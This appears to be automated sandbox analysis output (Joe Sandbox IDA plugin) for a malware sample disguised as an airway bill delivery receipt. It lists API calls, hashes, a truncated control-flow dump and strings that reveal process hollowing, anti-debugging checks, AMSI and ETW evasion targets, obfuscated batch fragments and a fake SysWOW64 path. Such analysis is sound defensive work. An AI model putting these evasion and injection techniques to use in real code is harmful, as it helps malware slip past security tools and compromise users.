                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                                                    • String ID:
                                                                                                    • API String ID: 1459852867-0
                                                                                                    • Opcode ID: 02210ebaa350d019f81ffc59b2cc763abc249d2d7df9a3eab6bec1d0b5cd3215
                                                                                                    • Instruction ID: 1b2d0c54559cd3be78886de77d0b244fd6553f64d518f05bd122c25809ee05c3
                                                                                                    • Opcode Fuzzy Hash: 02210ebaa350d019f81ffc59b2cc763abc249d2d7df9a3eab6bec1d0b5cd3215
                                                                                                    • Instruction Fuzzy Hash: C6016275948349BEEF06EBE0CA41BCD77BDAB44704F5045D2E360E6081DA74AB08CB21
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA
                                                                                                    • RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA64
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DAB6), ref: 02B3DA7A
                                                                                                    • NtDeleteFile.NTDLL(?), ref: 02B3DA99
                                                                                                      • Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                    • String ID:
                                                                                                    • API String ID: 1694942484-0
                                                                                                    • Opcode ID: be01b94577fef4a3d937be0ee1a6b3c306fd764ffd6af7b10dedca8ebbf6d470
                                                                                                    • Instruction ID: 18942b3dffc62d91750dd9baa2dc03d894410d6f9356a24cfd5d7173708cf0fd
                                                                                                    • Opcode Fuzzy Hash: be01b94577fef4a3d937be0ee1a6b3c306fd764ffd6af7b10dedca8ebbf6d470
                                                                                                    • Instruction Fuzzy Hash: C0014F71A04309BAEB11EBE0CD42FCEB7BDEB08700F5045E1E614E2590EB74AB088A60
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B36CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02B36D39,?,?,?,00000000), ref: 02B36D19
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,02B36E2C,00000000,00000000,02B36DAB,?,00000000,02B36E1B), ref: 02B36D97
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                    • String ID:
                                                                                                    • API String ID: 2151042543-0
                                                                                                    • Opcode ID: a262c2f2cb060725a7f308ce64205cd0b99b59112f248e29e4f515d8792ac359
                                                                                                    • Instruction ID: a3673d327e5ae6c5dd63de9fef6e45ba355575fb2bb925006226a1eca47235a8
                                                                                                    • Opcode Fuzzy Hash: a262c2f2cb060725a7f308ce64205cd0b99b59112f248e29e4f515d8792ac359
                                                                                                    • Instruction Fuzzy Hash: 60014230208314BEE716EF60CC2296FBBFDE749B10B9208B5F405D2650E6308D08C868
                                                                                                    APIs
                                                                                                    • InetIsOffline.URL(00000000,00000000,02B4AF99,?,?,?,000002F7,00000000,00000000), ref: 02B3ECA6
                                                                                                      • Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                      • Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                      • Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74FA0000,00000000), ref: 02B38879
                                                                                                      • Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74FA0000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74FA0000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                      • Part of subcall function 02B3EB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02B3EF90,UacInitialize,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString), ref: 02B3EB92
                                                                                                      • Part of subcall function 02B3EB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3EBA4
                                                                                                      • Part of subcall function 02B3EBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3EBF8
                                                                                                      • Part of subcall function 02B3EBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3EC0A
                                                                                                      • Part of subcall function 02B3EBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3EC21
                                                                                                      • Part of subcall function 02B27E10: GetFileAttributesA.KERNEL32(00000000,?,02B3F8C4,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,UacInitialize), ref: 02B27E1B
                                                                                                      • Part of subcall function 02B2C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C758C8,?,02B3FBF6,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession), ref: 02B2C2FB
                                                                                                      • Part of subcall function 02B3DBA8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DBE3
                                                                                                      • Part of subcall function 02B3DBA8: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DC13
                                                                                                      • Part of subcall function 02B3DBA8: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DC28
                                                                                                      • Part of subcall function 02B3DBA8: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DC54
                                                                                                      • Part of subcall function 02B3DBA8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DC5D
                                                                                                      • Part of subcall function 02B27E34: GetFileAttributesA.KERNEL32(00000000,?,02B42A41,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,Initialize), ref: 02B27E3F
                                                                                                      • Part of subcall function 02B27FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B42BDF,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,Initialize,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0), ref: 02B27FD5
                                                                                                      • Part of subcall function 02B3DAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DB96), ref: 02B3DB03
                                                                                                      • Part of subcall function 02B3DAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB3D
                                                                                                      • Part of subcall function 02B3DAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB6A
                                                                                                      • Part of subcall function 02B3DAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB73
                                                                                                      • Part of subcall function 02B38798: LoadLibraryW.KERNEL32(bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
                                                                                                      • Part of subcall function 02B38798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
                                                                                                      • Part of subcall function 02B38798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802
                                                                                                      • Part of subcall function 02B38704: LoadLibraryW.KERNEL32(amsi), ref: 02B3870D
                                                                                                      • Part of subcall function 02B38704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B3876C
                                                                                                    • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,02B4B328), ref: 02B449AF
                                                                                                      • Part of subcall function 02B3DA3C: RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA64
                                                                                                      • Part of subcall function 02B3DA3C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DAB6), ref: 02B3DA7A
                                                                                                      • Part of subcall function 02B3DA3C: NtDeleteFile.NTDLL(?), ref: 02B3DA99
                                                                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 02B44BAF
                                                                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 02B44C05
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                                    • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                    • API String ID: 2010126900-181751239
                                                                                                    • Opcode ID: d302ab3202f7e87978f4776264c1707afdf69d7333aaff4ecf7df924c78551a4
                                                                                                    • Instruction ID: 6d4ca2bb19920ed03925f197ca0d8a346f314e3bc2c78c9ac32b883bb2ca8568
                                                                                                    • Opcode Fuzzy Hash: d302ab3202f7e87978f4776264c1707afdf69d7333aaff4ecf7df924c78551a4
                                                                                                    • Instruction Fuzzy Hash: FC24F975A502688FDB12EB64DD80ADE73B6BF84300F1045E6E50DABA14DE30AE8DDF51

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph: graph for the function at 02B47870 (rendered graph not reproduced; block listing truncated). Its basic blocks consist of repeated calls to 02B2480C, 02B2494C, 02B246A4, 02B24798, 02B24898 and 02B3881C (the LoadLibraryA / GetModuleHandleA / GetProcAddress / FreeLibrary resolver listed under the APIs above); the block at 02B47C65 additionally calls 02B24D20 and 02B24D9C and ends in CreateProcessAsUserW. Block ranges present in the listing: 02B47870-02B47C5F, 02B47C65-02B47E38, 02B47E3A-02B47EB1, 02B47EB6-02B47FC1, 02B48AE9-02B48C6C, 02B48C72-02B48C81, 02B49418-02B4AA1D.
2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c * 16 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b37b90 call 2b38184 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c ExitProcess 5464->5554 5553->5554 5563 2b48c87-2b48f5a call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b3e538 call 2b2480c call 
2b2494c call 2b246a4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b27e10 5553->5563 5821 2b48f60-2b4920d call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24d8c * 2 call 2b24734 call 2b3dac4 5563->5821 5822 2b49212-2b49413 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b249a4 call 2b38ba8 5563->5822 5674 2b47fc3-2b47fc6 5573->5674 5675 2b47fc8-2b482e8 call 2b249a4 call 2b3dc88 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b3cf9c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 5573->5675 5574->5573 5674->5675 5988 2b48301-2b48ae4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 
2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c ResumeThread call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c CloseHandle call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b37ecc call 2b38798 * 6 CloseHandle call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 5675->5988 5989 2b482ea-2b482fc call 2b3857c 5675->5989 5821->5822 5822->5554 5988->5464 5989->5988
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                      • Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                      • Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74FA0000,00000000), ref: 02B38879
                                                                                                      • Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74FA0000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74FA0000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C757DC,02C75820,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C), ref: 02B47E31
                                                                                                    • ResumeThread.KERNEL32(00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0), ref: 02B4847B
                                                                                                    • CloseHandle.KERNEL32(00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C), ref: 02B485FA
                                                                                                      • Part of subcall function 02B38798: LoadLibraryW.KERNEL32(bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
                                                                                                      • Part of subcall function 02B38798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
                                                                                                      • Part of subcall function 02B38798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B8137C,02B4AFD0,UacInitialize,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C), ref: 02B489EC
                                                                                                      • Part of subcall function 02B27E10: GetFileAttributesA.KERNEL32(00000000,?,02B3F8C4,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,UacInitialize), ref: 02B27E1B
                                                                                                      • Part of subcall function 02B3DAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DB96), ref: 02B3DB03
                                                                                                      • Part of subcall function 02B3DAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB3D
                                                                                                      • Part of subcall function 02B3DAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB6A
                                                                                                      • Part of subcall function 02B3DAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB73
                                                                                                      • Part of subcall function 02B38184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B3820E), ref: 02B381F0
                                                                                                    • ExitProcess.KERNEL32(00000000,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,Initialize,02B8137C,02B4AFD0,00000000,00000000,00000000,ScanString,02B8137C,02B4AFD0), ref: 02B4AA1D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
                                                                                                    • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                    • API String ID: 2481178504-1225450241
                                                                                                    • Opcode ID: 2b3c76ede034ed0ee09bdfa421ab2afbaa0b07440bc8918fee9bf0f59240d5aa
                                                                                                    • Instruction ID: e49ed1a94925b7c19387c904880e2041d7018f32ab8e7507339f81a9f34ad271
                                                                                                    • Opcode Fuzzy Hash: 2b3c76ede034ed0ee09bdfa421ab2afbaa0b07440bc8918fee9bf0f59240d5aa
                                                                                                    • Instruction Fuzzy Hash: 6543FA75A502688FDB12EB64DD809DE73B6AF84300F1045E6E50EEBA14DE30AE8DDF51

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000,?,02B22000), ref: 02B217D0
                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,02B22000), ref: 02B217E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
